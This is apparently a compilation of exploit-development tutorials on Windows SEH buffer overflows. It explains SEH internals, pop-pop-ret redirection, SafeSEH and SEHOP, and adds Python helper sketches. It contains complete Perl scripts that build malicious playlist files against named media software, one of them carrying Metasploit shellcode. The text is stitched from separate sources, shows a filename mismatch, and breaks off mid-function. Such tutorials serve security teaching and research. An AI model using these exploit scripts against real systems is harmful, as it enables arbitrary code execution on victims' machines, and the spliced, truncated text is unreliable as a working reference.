overwritten with 42424242 (4 B’s, as expected).
Let’s replace the SE Handler with a pointer to pop pop ret, and replace next SEH with 4
breakpoints. (no jumpcode yet, we just want to find our payload) :
Look at the list of loaded modules and try to find a pop pop ret in one of the modules. (You
can use the Ollydbg “SafeSEH” plugin to see whether the modules are compiled with safeSEH
or not).
xaudio.dll, one of the application dll’s, contains multiple pop pop ret’s. We’ll use the one at
0x1002083D :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="\xcc\xcc\xcc\xcc"; # 4 breakpoints
my $seh=pack('V',0x1002083D); # pop pop ret from xaudio.dll
my $shellcode="D"x($totalsize-length($junk.$nseh.$seh));
my $payload=$junk.$nseh.$seh.$shellcode;
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);
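For readers more at home in Python than perl: pack('V', ...) writes an unsigned 32-bit value in little endian byte order, and struct.pack("<I", ...) does the same. The sketch below (helper names are made up for illustration) also checks the packed pointer for null bytes, since a pointer containing 0x00 often gets cut off by string handling. The second address is a hypothetical one, used only to show a failing case.

```python
import struct

def pack_pointer(address):
    """Little-endian 32-bit pack, the Python counterpart of Perl's pack('V', ...)."""
    return struct.pack("<I", address)

def has_bad_bytes(address, bad=b"\x00"):
    """True if any byte of the packed pointer is in the bad character set."""
    return any(byte in bad for byte in pack_pointer(address))

seh = pack_pointer(0x1002083D)        # pop pop ret address used in the text
print(seh.hex())                      # 3d080210
print(has_bad_bytes(0x1002083D))      # False
print(has_bad_bytes(0x00401234))      # True (hypothetical address with a null byte)
```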
At the first Access violation, we passed the exception back to the application. pop pop ret was
executed and you should end up on the breakpoint code (in nseh)
Now where is our payload ? It should look like a lot of D’s (after seh)… but it could be A’s as
well (at the beginning of the buffer – let’s find out) :
If the payload is after seh, (and the application stopped at our break), then EIP should now
point to the first byte of nseh (our breakpoint code), and thus a dump eip should show nseh,
followed by seh, followed by the shellcode :
0:000> d eip
Ok, that looks promising, however we can see some null bytes after about 32 bytes (in blue)…
so we have 2 options : use the 4 bytes of code at nseh to jump over seh, and then use those 16
bytes to jump over the null bytes. Or jump directly from nseh to the shellcode.
First, let’s verify that we are really looking at the start of the shellcode (by replacing the first
D’s with some easily recognized data) :
my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="\xcc\xcc\xcc\xcc";
my $seh=pack('V',0x1002083D);
my $shellcode="A123456789B123456789C123456789D123456789";
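my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$shellcode));
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);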
efl=00000246+0x12f99f:
0012f9a0 cc int 3
0:000> d eip
Ok, so it is the beginning of the shellcode, but there is a little “hole” after the first couple of
shellcode bytes… (see null bytes in red)
Let’s say we want to jump over the hole, and start the shellcode with 4 NOP’s (so we can put
our real shellcode at 0012f9c0… basically use 24 NOP’s in total before the shellcode), then we
need to jump (from nseh) 30 bytes. (That’s 0xeb,0x1e), then we can do this :
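my $totalsize=5005;
my $sploitfile="c0d3r.mpf";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
my $nseh="\xeb\x1e\x90\x90"; # jump 30 bytes
my $seh=pack('V',0x1002083D);
my $nops = "\x90" x 24;
my $shellcode="\xcc\xcc\xcc\xcc";
my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2;
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);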
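Where do the 30 bytes and the 24 NOP’s come from? A short jump (EB) is 2 bytes long and its operand is counted from the end of the jump instruction. The sketch below does the arithmetic with the two addresses seen in the debugger (nseh at 0012f9a0, target at 0012f9c0); the helper name is made up for illustration.

```python
def short_jmp(from_addr, to_addr):
    """Encode a JMP SHORT (EB rel8) placed at from_addr that lands on to_addr."""
    rel = to_addr - (from_addr + 2)   # displacement is relative to the next instruction
    if not -128 <= rel <= 127:
        raise ValueError("target out of range for a short jump")
    return bytes([0xEB, rel & 0xFF])

nseh_addr = 0x0012F9A0        # first byte of next SEH
target_addr = 0x0012F9C0      # where the real shellcode should start

jump = short_jmp(nseh_addr, target_addr)
nop_count = target_addr - (nseh_addr + 8)   # skip next SEH (4 bytes) and SE Handler (4 bytes)

print(jump.hex())   # eb1e
print(nop_count)    # 24
```

0x1e is 30 decimal, and the 24 bytes between the end of SE Handler and 0012f9c0 are the ones filled with NOP’s.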
Open the mpf file and you should be stopped at the breakpoint (at 0x0012f9c0) after passing
the first exception to the application :
00400000*** ERROR: Module load completed but symbols could not be loaded for image
00400000image00400000+0x3734:
0:000> g
efl=00000246+0x12f9bf:
0012f9c0 cc int 3
Ok, now replace the breaks with real shellcode and finalize the script :
# -----------------------------------------------------------------------------
# MMMMM~.
# MMMMM?.
# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMM MM?7MMMMMMMMMM: MMMMMMMMMMM:
# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM ?MMMMMZMMMMMI.MMMMMZMMMMM:
# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
# eip hunters
# -----------------------------------------------------------------------------
my $totalsize=5005;
my $sploitfile="c0d3r.m3u";
my $junk = "http:AA";
$junk=$junk."A" x 4105;
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, CMD=calc
my $shellcode="\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" .
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" .
"\x58\x50\x44\x45\x50\x43\x30\x43\x30\x4c\x4b\x51\x55\x47" .
"\x4c\x4c\x4b\x43\x4c\x45\x55\x43\x48\x45\x51\x4a\x4f\x4c" .
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a" .
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x4a\x4e\x50" .
"\x31\x49\x50\x4d\x49\x4e\x4c\x4c\x44\x49\x50\x42\x54\x43" .
"\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4b" .
"\x44\x47\x4b\x51\x44\x47\x54\x45\x54\x42\x55\x4b\x55\x4c" .
"\x4b\x51\x4f\x46\x44\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44" .
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c" .
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x51" .
"\x34\x45\x54\x48\x43\x51\x4f\x50\x31\x4a\x56\x43\x50\x51" .
"\x46\x45\x34\x4c\x4b\x47\x36\x46\x50\x4c\x4b\x47\x30\x44" .
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45" .
"\x58\x4b\x39\x4b\x48\x4b\x33\x49\x50\x43\x5a\x46\x30\x42" .
"\x48\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x42\x48\x4a\x38\x4b" .
"\x4e\x4d\x5a\x44\x4e\x51\x47\x4b\x4f\x4a\x47\x42\x43\x45" .
"\x31\x42\x4c\x45\x33\x45\x50\x41\x41";
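my $nseh="\xeb\x1e\x90\x90"; # jump 30 bytes
my $seh=pack('V',0x1002083D); # pop pop ret from xaudio.dll
my $nops = "\x90" x 24;
my $junk2 = "D" x ($totalsize-length($junk.$nseh.$seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$junk2;
#
print " [+] Writing exploit file $sploitfile\n";
open (myfile,">$sploitfile");
print myfile $payload;
close (myfile);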
https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-
just-another-example-part-3b/
Introduction
The buffer overflow exploits covered so far in this tutorial series have generally involved some
form of direct EIP overwrite using a CALL or JMP instruction(s) to reach our shellcode. Today
we’ll take a look at a different approach using Windows Structured Exception Handling (SEH).
Before I begin explaining the basic mechanics of Windows Structured Exception Handling (as
it’s implemented in an x86, 32-bit environment) it bears mentioning that I intentionally
omitted several details (termination handling vs. exception handling, unwinding, vectored
exception handling, etc.) to focus on the basic concepts and to provide enough background
information to understand SEH in the context of exploit writing. I encourage you to read up on
these additional details using the references I’ve provided at the end of this post.
Structured Exception Handling (SEH) is a Windows mechanism for handling both hardware and
software exceptions consistently.
Those with programming experience might be familiar with the exception handling construct
which is often represented as a try/except or try/catch block of code. For the purposes of this
discussion, I’ll reference the Microsoft extension to the C/C++ languages which looks as
follows:
__try {
    // the block of code to try (aka the "guarded body")
    ...
}
__except (exception filter) {
    // the code to run in the event of an exception (aka the "exception handler")
    ...
}
The concept is quite simple — try to execute a block of code and if an error/exception occurs,
do whatever the “except” block (aka the exception handler) says. The exception handler is
nothing more than another block of code that tells the system what to do in the event of an
exception. In other words, it handles the exception.
Regardless of where the exception handler is defined (application vs. OS) or what type of
exception it is designed to handle, all handlers are managed centrally and consistently by
Windows SEH via a collection of designated data structures and functions, which I’ll cover at a
high level in the next section.
For every exception handler, there is an Exception Registration Record structure which looks
like this:
typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;
    PEXCEPTION_ROUTINE Handler;
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;
source: http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-exploitation-of-seh-overwrites-with-sehop.aspx
These registration records are chained together to form a linked list. The first field in the
registration record (*Next) is a pointer to the next _EXCEPTION_REGISTRATION_RECORD in the
SEH chain. In other words, you can navigate the SEH chain from top to bottom by using
the *Next address. The second field (Handler), is a pointer to an exception handler function
which looks like this:
EXCEPTION_DISPOSITION
__cdecl _except_handler(
    struct _EXCEPTION_RECORD *ExceptionRecord,
    void * EstablisherFrame,
    struct _CONTEXT *ContextRecord,
    void * DispatcherContext
);
The first function parameter is a pointer to an _EXCEPTION_RECORD structure. As you can see
below, this structure holds information about the given exception including the exception
code, exception address, and number of parameters.
typedef struct _EXCEPTION_RECORD {
    DWORD ExceptionCode;
    DWORD ExceptionFlags;
    struct _EXCEPTION_RECORD *ExceptionRecord;
    PVOID ExceptionAddress;
    DWORD NumberParameters;
    DWORD ExceptionInformation[EXCEPTION_MAXIMUM_PARAMETERS];
} EXCEPTION_RECORD;
source: http://www.microsoft.com/msj/0197/exception/exception.aspx
The _except_handler function uses this information (in addition to the registers data provided
in the ContextRecord parameter) to determine if the exception can be handled by the current
exception handler or if it needs to move to the next registration record.
The EstablisherFrame parameter also plays an important role, which we’ll get to in a bit.
So how does Windows SEH use the registration record, handler function, and exception record
structure when trying to handle an exception? When an exception occurs, the OS starts at the
top of the chain and checks the first _EXCEPTION_REGISTRATION_RECORD Handler function to
see if it can handle the given error (based on the information passed in
the ExceptionRecord and ContextRecord parameters). If not, it will move to the
next _EXCEPTION_REGISTRATION_RECORD (using the address pointed to by *Next). It will
continue moving down the chain in this manner until it finds the appropriate exception
handler function. Windows places a default/generic exception handler at the end of the chain
to help ensure the exception will be handled in some manner (represented by FFFFFFFF) at
which point you’ll likely see the “…has encountered a problem and needs to close” message.
Each thread has its own SEH chain. The OS knows how to locate the start of this chain by
referencing the ExceptionList address of the thread information/environment block (TIB/TEB)
which is located at FS:[0]. Here’s a basic diagram of the Windows SEH chain with a simplified
version of the _EXCEPTION_REGISTRATION_RECORD:
This is by no means a complete overview of SEH or all of its data structures, but it should
provide you with enough detail to understand the fundamental concepts. Now let’s take a look
at SEH in the context of an actual application.
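To make the walk down the chain concrete, here is a small simulation in Python. It is a toy model only: the record addresses and handler values are hypothetical, the chain is a plain dictionary rather than real memory, and the "can this handler deal with it" decision is reduced to a callback.

```python
END_OF_CHAIN = 0xFFFFFFFF

def walk_seh_chain(records, exception_list, can_handle):
    """Walk a simulated SEH chain.

    records maps a record address to its (Next, Handler) pair.
    Returns the visited record addresses and the handler that accepted, if any.
    """
    visited = []
    address = exception_list
    while address != END_OF_CHAIN:
        next_record, handler = records[address]
        visited.append(address)
        if can_handle(handler):
            return visited, handler
        address = next_record
    return visited, None

# Hypothetical addresses, chosen only for illustration.
DEFAULT_HANDLER = 0x7C839AC0
records = {
    0x0012FF50: (0x0012FFB0, 0x00401500),        # application handler
    0x0012FFB0: (0x0012FFE0, 0x00401800),        # another application handler
    0x0012FFE0: (END_OF_CHAIN, DEFAULT_HANDLER), # last record, Next = FFFFFFFF
}

# Pretend only the default handler accepts this exception.
visited, handler = walk_seh_chain(records, 0x0012FF50, lambda h: h == DEFAULT_HANDLER)
print([hex(a) for a in visited], hex(handler))
```

The first argument to the walk plays the role of the ExceptionList pointer at FS:[0], and each step follows the Next field until a handler accepts the exception or FFFFFFFF is reached.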
SEH Example
Let’s take a look at how SEH is implemented in practice, using Windows Media Player as an
example. Recall from Part 1 of this exploit series that you can view the contents of the TEB
using the !teb command in WinDbg. Here is a snapshot of the running process threads and a
look at one of the associated TEBs for Windows Media Player (on a Win XP SP3 machine):
Notice the ExceptionList address. This is the address of the start of the SEH chain for that
thread (yours may vary). In other words, this address points to the
first _EXCEPTION_REGISTRATION_RECORD in the SEH chain. Let’s take a look at how to find
this same information in Immunity Debugger.
After attaching Windows Media Player to Immunity, you can hit Alt+M to view the Memory
Modules. In this example, I’ll double-click the same thread examined in WinDbg (00013C20).
This opens up the Dump window for that thread, which you’ll notice is the TEB. Just as in
WinDbg, you’ll see that the start of the SEH chain is located at 02B6FF5C.
Another way to find the start of the SEH chain for the current thread is by dumping FS:[0] as
follows:
Again, notice the first address is 02B6FF5C (the start of the SEH chain), which in turn points to
02B6FFDC.
The final, and easiest method of viewing the SEH chain in Immunity is by hitting Alt+S:
No surprise, the first entry in the chain is 02B6FF5C. What this SEH chain window also clearly
shows is that there are two _EXCEPTION_REGISTRATION_RECORDs for this thread (SEH chain
length = 2) and they both point to the same exception handler function.
If you take a look at the stack for this thread (towards the bottom), you’ll be able to see this
SEH chain, starting at 02B6FF5C.
Again, you can see both registration records in the SEH chain — the first is the start of the
chain located at 02B6FF5C and the second is the default handler (as indicated by FFFFFFFF /
“End of SEH Chain“) at 02B6FFDC.
Exploiting SEH
Now that you have an idea of how Windows SEH works and how to locate the SEH chain in
Immunity, let’s see how it can be abused to craft reliable exploits. For this example, I’m going
to use the basic C program example from Part 1 of this exploit series (original source:
Wikipedia).
For demo purposes I’ve compiled it using MS Visual Studio Command Line with the /Zi switch
(for debugging) and /GS- switch (to remove stack cookie protection). Running the program
with an argument of 10 A’s (stack_demo.exe AAAAAAAAAA) you can see that by default there
are two entries in the SEH chain (neither of which are explicitly defined in the application code
itself).
To further illustrate how Windows SEH centrally manages all exceptions (regardless of where
they are defined) I’ll add a __try/__except block to this example program and lengthen the
SEH chain by one.
The added __except block doesn’t have any exception handling code but as you can see in the
next screenshot, the new exception handler has been added to the top of the SEH chain.
If you want to walk through the addition of this new entry to the SEH chain, set a couple of
breakpoints before and after function foo( ) is called. Since this was compiled with debugging
enabled you can easily do this in Immunity by going to View–>Source Files and clicking on the
name of the executable (in my case I named the updated version stack_demo_seh.exe).
Select the line(s) where you’d like to enable a breakpoint and hit F2. In my case I put one right
before the call to foo( ) (to see the addition of the new SEH registration record) and one right
before the call to strcpy (so I can step through writing of the arg to the stack).
After hitting our breakpoints and stepping through execution of strcpy (using F7), you should
see the new _EXCEPTION_REGISTRATION_RECORD on the stack above the previous two
entries.
Let me take this opportunity to highlight a few of the other surrounding entries on the stack
(Note: you won’t see stack cookies here since I used /GS- when compiling).
As you can see, the local variables are written to the stack right above the SEH record. In this
case our 10 character argument fits within the allocated buffer, but because there is no
bounds checking with strcpy( ), if we were to make it larger, we can overwrite the values of
Next SEH and SEH.
Let’s try by passing 28 A’s as an argument (you can pass arguments in Immunity via File ->
Open).
Viewing the SEH chain (Alt+S) you should see this:
Clearly we’ve overwritten our SEH chain, but this alone is not enough to lead to a viable
exploit. In addition to controlling the values of Next SEH and SEH we also need to trigger an
exception so that the exception handler is called by the OS. What exactly will trigger an
exception (and which handler is called) is going to be dependent upon the application but
quite often it is enough to simply continue writing beyond the end of the stack to generate an
error that results in the OS calling the SEH chain.
With this example program, we know that 28 A’s is just enough to overwrite Next SEH and
SEH. This time let’s make the total length of our argument 500, but instead of using all A’s,
let’s use the letter B for character positions 21-28. The length should be enough to overwrite
the stack to a point that it generates an exception and we should see Next SEH and SEH
overwritten with B’s.
By overwriting SEH (which is called when an exception occurs), we have taken control of EIP.
But how can we use this to execute shellcode? The answer lies in the second parameter of
the _except_handler function we examined earlier.
EXCEPTION_DISPOSITION
__cdecl _except_handler(
    struct _EXCEPTION_RECORD *ExceptionRecord,
    void * EstablisherFrame,
    struct _CONTEXT *ContextRecord,
    void * DispatcherContext
);
When this Exception Handler function is called, the EstablisherFrame value is placed on the
stack at ESP+8. This EstablisherFrame value is actually the address of
our _EXCEPTION_REGISTRATION_RECORD which, as we’ve already established, starts with
Next SEH (also under our control).
So, when an exception occurs and the Exception Handler (SEH) is called, its value is put in EIP.
Since we have control over SEH, we now have control over EIP and the execution flow of the
application. We also know that the EstablisherFrame (which starts with Next SEH) is located at
ESP+8, so if we can load that value into EIP we can continue to control the execution flow of
the application.
Here’s a screenshot of EIP and the stack at the time the Exception Handler is executed:
So how do we get the EstablisherFrame/_EXCEPTION_REGISTRATION_RECORD address loaded
into EIP? There are several possible approaches, the most common of which is to overwrite
SEH with the address of a POP+POP+RET instruction sequence, which loads the value at ESP+8 into EIP.
Using the above screenshot as an example, instead of 42424242, EIP would be overwritten
with the address of a POP+POP+RET sequence. This would pop the first two entries off of the
stack and the return instruction would load 0012FF5C (the address of
the _EXCEPTION_REGISTRATION_RECORD) into EIP. Since we have control over the contents of
that address, we could then execute code of our choosing.
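The effect of POP+POP+RET on the stack can be simulated in a few lines. This is a toy model under stated assumptions: the ESP value and the first two stack entries are hypothetical, and only the value at ESP+8 (0012FF5C, the registration record address mentioned above) comes from the text.

```python
def pop_pop_ret(stack, esp):
    """Simulate POP r32; POP r32; RET on a stack given as {address: dword}."""
    esp += 4            # first POP discards [ESP]
    esp += 4            # second POP discards [ESP+4]
    eip = stack[esp]    # RET loads the dword now at the top of the stack
    esp += 4
    return eip, esp

ESP_AT_HANDLER = 0x0012FB10          # hypothetical ESP when the handler is entered
stack = {
    ESP_AT_HANDLER + 0: 0x7C9032A8,  # hypothetical return address into the dispatcher
    ESP_AT_HANDLER + 4: 0x0012FBF8,  # hypothetical ExceptionRecord pointer
    ESP_AT_HANDLER + 8: 0x0012FF5C,  # EstablisherFrame: address of the registration record
}

eip, esp = pop_pop_ret(stack, ESP_AT_HANDLER)
print(hex(eip))   # 0x12ff5c
```

Which two registers the POPs use does not matter here; they only move ESP forward by 8 so that RET picks up the EstablisherFrame value.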
Since this basic demo code has no usable pop + pop + ret instructions, let’s turn our attention
to a real-world vulnerable application and apply what we’ve covered into developing a working
SEH exploit.
Before we start writing any code, let’s first take a look at the typical construct for an SEH
exploit. The most basic SEH exploit buffer is going to be constructed as follows:
It will start with some filler/junk to offset the buffer to the exact overwrite of Next SEH and
SEH. Remember, SEH will be loaded into EIP when the exception is triggered. Since it will
contain the address of a POP+POP+RET sequence, the address of
the _EXCEPTION_REGISTRATION_RECORD located at ESP+8 will then be loaded into EIP.
Program execution will then immediately hit Next SEH and execute whatever instruction
resides there. In this basic SEH exploit one would generally control everything on the stack
from Next SEH onward. This means that we can place our shellcode immediately after SEH. The
problem we run into is that when program flow is redirected to Next SEH, it will once again run
into SEH unless we can figure out a way around it. To do so, we can place a short jump in Next
SEH, which will hop over SEH and into our shellcode.
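The layout described above can be checked with placeholder content before any real values are known. The sketch below is illustrative only: the function name, the offset of 100, the address 0x11223344 and the 4-byte breakpoint payload are all hypothetical stand-ins, and the short jump EB 06 padded with two NOPs is one common way to hop from Next SEH to the byte right after SEH.

```python
import struct

def build_layout(offset, ppr_address, payload, total=None, filler=b"A"):
    """junk | Next SEH (short jump) | SEH (pop pop ret pointer) | payload | padding"""
    junk = filler * offset
    nseh = b"\xEB\x06\x90\x90"             # JMP SHORT +6, then two NOPs as padding
    seh = struct.pack("<I", ppr_address)   # little-endian pointer
    buf = junk + nseh + seh + payload
    if total is not None:
        buf += b"D" * (total - len(buf))   # pad to a fixed total size
    return buf

# Hypothetical values, chosen only to verify the offsets.
buf = build_layout(offset=100, ppr_address=0x11223344, payload=b"\xCC" * 4, total=200)

print(buf[100:104].hex())   # eb069090  (Next SEH)
print(buf[104:108].hex())   # 44332211  (SEH)
print(buf[108:112].hex())   # cccccccc  (first bytes after SEH)
```

The jump sits at offset 100, is 2 bytes long and skips 6 more, so execution resumes at offset 108, the first byte after SEH.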
For this SEH Exploit exercise, I’ll use one of my published exploits for AudioCoder 0.8.22. You
can download the vulnerable application directly from this link:
http://www.exploit-db.com/exploits/29309/. I’ll start from scratch so you can see how
the exploit is built, step-by-step.
Once you’ve installed/launched AudioCoder attach Immunity Debugger and run (F9). This
particular program is vulnerable to a buffer overflow condition as it does not perform any
bounds checking when reading an .m3u file. To verify this vulnerability, first create an .m3u file
with a 5000 character Metasploit pattern. Recall the command to create this pattern in Kali
is ../metasploit-framework/tools/pattern_create.rb 5000. You can copy the pattern into a perl
script and create the m3u file as follows (don’t forget the “http://”):
When you open the resulting .m3u file within AudioCoder, you should see something similar to
the following in Immunity:
As you can see, we’ve overwritten EIP as well as our SEH Registration Record with our
Metasploit pattern. You can examine the SEH chain (Alt+S) to verify.
Remember that we have control over EIP because we’ve overwritten SEH. We also know that
at the time of crash, ESP+8 points to Next SEH. So, if we can overwrite SEH with the address of
a POP+POP+RET instruction we can redirect execution flow to Next SEH. There are a couple of
ways to search for a usable POP+POP+RET instruction in Immunity. First, you can right click on
the Disassembly window (top left) and select “Search for” –> “All sequences in all modules”. To
use this method you need to know the registers you wish to include in the POP instructions.
For example:
This particular choice of registers returns many results to choose from. Remember that
instructions that reside in an application (vs. OS) module are preferred for exploit portability.
Another way to find the POP+POP+RET instruction address is to use the mona plugin for
Immunity (!mona seh):
The benefit of using mona is that it also identifies which modules have been compiled with
SafeSEH, a protection that would eliminate the viability of an SEH-based exploit. I’ll explain
more about SafeSEH in the next section, but for now just remember to avoid modules that
have been compiled with it. Lucky for us, AudioCoder has plenty of non-SafeSEH modules to
choose from!
Once we’ve chosen a usable POP+POP+RET instruction (I chose 6601228E which is a POP EDI +
POP EBP + RET instruction from AudioCoder/libiconv-2.dll) the next thing we need to do is
figure out the offset to Next SEH. As you may remember from previous tutorials, there are a
couple of ways to do this. You can use pattern_offset.rb to determine the offset for 7A41327A.
So we have our POP+POP+RET address and our offset. Now all we need is some jump code for
Next SEH and our Shellcode.
The jump code we need for Next SEH only needs to get us past the 4 bytes of SEH. If you recall
from part 4 of the series, a short forward jump is represented by opcode EB. For
example \xeb\x14 is a 20 byte forward jump. We can jump a bit beyond SEH as long as we
preface our shellcode with some NOPs.
So, we have:
At this point we’re ready to construct our exploit which I’ve included below:
#!/usr/bin/perl
###############################################################################
# Exploit Title: AudioCoder 0.8.22 (.m3u) – SEH Buffer Overflow
# Date: 10-18-2013
# Exploit Author: Mike Czumak (T_v3rn1x) — @SecuritySift
# Vulnerable Software: AudioCoder 0.8.22 (http://www.mediacoderhq.com/audio/)
# Software Link: http://www.fosshub.com/download/AudioCoder-0.8.22.5506.exe
# Version: 0.8.22.5506
# Tested On: Windows XP SP3
# Creates an .m3u file to exploit basic seh bof
###############################################################################
Open the resulting m3u file in AudioCoder (without a debugger) and you should see:
Alternatives to the POP+POP+RET
If you cannot locate a usable POP+POP+RET instruction, you may be able to reach your
shellcode in a different manner. Take another look at the following screenshot from our earlier
basic C program example once again.
Not only does ESP+8 point to our Next SEH address – so does ESP+14, ESP+1c, etc. This gives us
some additional options for calling this address.
Popad
One such option is the popad instruction, which I’ve covered in an earlier tutorial.
Recall popad pops the first eight values from the stack into the registers in the following
order: EDI, ESI, EBP, ESP (this fourth value is discarded), EBX, EDX, ECX, and EAX. A single popad
instruction will therefore leave the address to Next SEH in EBP, EDX, and EAX. To use this method in our SEH
exploit we would need to not only find a popad instruction but one that also has a JMP/CALL
EBP, JMP/CALL EDX, or JMP/CALL EAX instruction immediately after it. This particular
AudioCoder application had no such set of instructions.
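Why EBP, EDX and EAX? popad consumes eight dwords, and the fourth one (the slot that would restore ESP) is thrown away. The simulation below is a sketch with a made-up stack: the filler values are hypothetical, and the Next SEH pointer is placed at ESP+8, ESP+14 and ESP+1c as described above.

```python
# Order in which POPAD consumes stack dwords; None marks the discarded ESP slot.
POPAD_ORDER = ("EDI", "ESI", "EBP", None, "EBX", "EDX", "ECX", "EAX")

def popad(stack_dwords):
    """Return the register values after POPAD, given the 8 dwords at ESP+0..ESP+1C."""
    regs = {}
    for name, value in zip(POPAD_ORDER, stack_dwords):
        if name is not None:
            regs[name] = value
    return regs

NSEH = 0x0012FF5C   # address of Next SEH (registration record)
stack = [
    0x11111111,  # ESP+00 (hypothetical filler)
    0x22222222,  # ESP+04 (hypothetical filler)
    NSEH,        # ESP+08
    0x33333333,  # ESP+0C (discarded)
    0x44444444,  # ESP+10 (hypothetical filler)
    NSEH,        # ESP+14
    0x55555555,  # ESP+18 (hypothetical filler)
    NSEH,        # ESP+1C
]

regs = popad(stack)
print(sorted(r for r, v in regs.items() if v == NSEH))   # ['EAX', 'EBP', 'EDX']
```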
If there are no usable popad or POP+POP+RET instructions, you may try to jump directly to
Next SEH on the stack by finding a JMP or CALL instruction to an offset to ESP (+8, +14, +1c,
+2c, etc) or EBP (+c, +24, +30, etc). Again, the AudioCoder application did not have any usable
instructions to demonstrate this technique.
The key to both of these options is that just as with POP+POP+RET you must select instructions
from modules that were not compiled with SafeSEH or the exploit will fail. You will also want
to avoid addresses containing null bytes.
Without going into too much detail about protections such as stack cookies and ASLR (which
I’ll save for another post), I want to briefly touch on two protections that target SEH exploits
specifically: SafeSEH and SEHOP. This section will only familiarize you with the most basic
concepts of these protections so I encourage you to research more on the topics.
SafeSEH
Windows XP SP2 introduced the SafeSEH protection mechanism in which validated exception
handlers are registered and stored in a table. The addresses in this table are checked prior to
executing a given exception handler to ensure it is deemed “safe”. As a result, a POP+POP+RET
address used to overwrite an SEH record that comes from a module compiled with SafeSEH
will not appear in the table and the SEH exploit will fail.
SafeSEH is effective at preventing SEH-based exploits as long as the SEH overwrite address (e.g.
POP+POP+RET) comes from a module compiled with SafeSEH. The good news (from an
exploitability perspective) is that application modules are not typically compiled with SafeSEH
by default. Even if most are, any module loaded by an application that was not compiled with
SafeSEH can be used for your SEH overwrite. You can easily find such modules with mona:
Alternatively, you can use the !mona seh command which will only look in modules compiled
without SafeSEH by default.
The key with bypassing SafeSEH is to find a module that was not compiled with the option.
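The decision described above can be pictured with a deliberately simplified model. This is not how Windows implements the check (the real logic has more cases); the class, the module bases and sizes, and protected.dll are hypothetical, and only the libiconv-2.dll address 6601228E comes from the text.

```python
from dataclasses import dataclass, field

@dataclass
class Module:
    name: str
    base: int
    size: int
    safeseh: bool                              # compiled with SafeSEH?
    handlers: set = field(default_factory=set) # registered "safe" handlers

    def contains(self, address):
        return self.base <= address < self.base + self.size

def handler_allowed(modules, handler):
    """Toy SafeSEH decision for a handler address."""
    for module in modules:
        if module.contains(handler):
            if not module.safeseh:
                return True                    # no table to check against
            return handler in module.handlers  # must be a registered handler
    # Outside any loaded module: real Windows applies further checks here;
    # this toy model simply rejects the handler.
    return False

modules = [
    Module("libiconv-2.dll", 0x66000000, 0x100000, safeseh=False),   # hypothetical base/size
    Module("protected.dll", 0x10000000, 0x10000, safeseh=True,       # hypothetical module
           handlers={0x10001000}),
]

print(handler_allowed(modules, 0x6601228E))   # True: module not compiled with SafeSEH
print(handler_allowed(modules, 0x10002000))   # False: not in the module's handler table
```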
SEHOP
As previously stated, one of the downsides of SafeSEH is that it required changing and
rebuilding/compiling executables. Rather than require code changes, SEHOP works at run time
and verifies that a thread’s exception handler chain is intact (can be navigated from top to
bottom) before calling an exception handler. As a result, overwriting the SEH address would
break the chain and trigger SEHOP, rendering the SEH exploit attempt ineffective. SEHOP does
this by adding a custom record to the end of the SEH chain. Prior to executing an exception
handler, the OS ensures this custom record can be reached by walking the chain from top to
bottom.
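The chain validation idea can also be simulated. Again this is a toy model under stated assumptions: memory is a dictionary, all addresses and handler values are hypothetical, and the "custom record" is recognised simply by its handler value. It shows why the usual jump code in Next SEH (EB 06 90 90, read as the pointer 909006EB) makes the walk fail.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF

def chain_is_intact(records, head, final_handler, max_records=64):
    """Toy SEHOP check: can the final record be reached by following Next pointers?"""
    address = head
    for _ in range(max_records):
        if address not in records:
            return False                      # Next points at something that is not a record
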